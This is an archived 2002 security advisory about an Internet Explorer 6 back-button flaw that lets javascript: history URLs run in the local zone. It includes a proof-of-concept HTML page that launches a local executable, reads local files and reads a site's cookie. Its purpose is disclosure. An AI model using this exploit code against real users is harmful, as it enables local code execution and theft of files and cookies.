26th Sep 2002 [SBWID-5274]
	IE back button can cause execution of script from history URL's
	IE 6.0 at least
	In Andreas Sandblad [[email protected]] post :
	IE allows urls containing the javascript protocol in the  history  list.
	Code injected in the url will operate in the  same  zone/domain  as  the
	last url viewed. The javascript url can be set to trigger  when  a  user
	presses the backbutton.
	The normal behaviour  when  a  page  fails  to  load  is  to  press  the
	backbutton. The error page  shown  by  IE  is  operating  in  the  local
	computer  zone   (res://C:\WINNT\System32\shdoclc.dll/dnserror.htm#   on
	Win2000). Thus, we can execute code and read local files.
	The exploit works as follow: Press one of the links and  then  the  back
	Note: Exploit has only been tested on fully patched IE 6.0, with Win  XP
	and Win2000 pro (assume other OS are also vulnerable).  Winmine.exe  and
	test.txt must exist.
	--------------------------CUT HERE-------------------------------
	<h1>Press link and then the backbutton to trigger script.</h1>
	<a href="javascript:execFile('file:///c:/winnt/system32/winmine.exe')">
	Run Minesweeper (c:/winnt/system32/winmine.exe Win2000 pro)</a><br>
	<a href="javascript:execFile('file:///c:/windows/system32/winmine.exe')">
	Run Minesweeper (c:/windows/system32/winmine.exe XP, ME etc...)</a><br>
	<a href="javascript:readFile('file:///c:/test.txt')">
	Read c:\test.txt (needs to be created)</a><br>
	<a href="javascript:readCookie('http://www.google.com/')">
	Read Google cookie</a>
	// badUrl = "http://www.nonexistingdomain.se"; // Use if not XP
	badUrl = "res:";
	function execFile(file){
	  s = '<object classid=CLSID:11111111-1111-1111-1111-111111111111 ';
	  s+= 'CODEBASE='+file+'></OBJECT>';
	function readFile(file){
	  s = '<iframe name=i src='+file+' style=display:none onload=';
	  s+= 'alert(i.document.body.innerText)></iframe>';
	function readCookie(url){
	  s = '<script>alert(document.cookie);close();<"+"/script>';
	function backBug(url,payload){
	  len = history.length;
	  page = document.location;
	  s = "javascript:if (history.length!="+len+") {";
	  s+= "open('javascript:document.write(\""+payload+"\")')";
	  s+= ";history.back();} else '<script>location=\""+url
	  s+= "\";document.title=\""+page+"\";<"+"/script>';";
	  location = s;
	--------------------------CUT HERE-------------------------------
	                                                   _     _
	                                                 o' \,=./ `o
	                                                    (o o)
	None yet.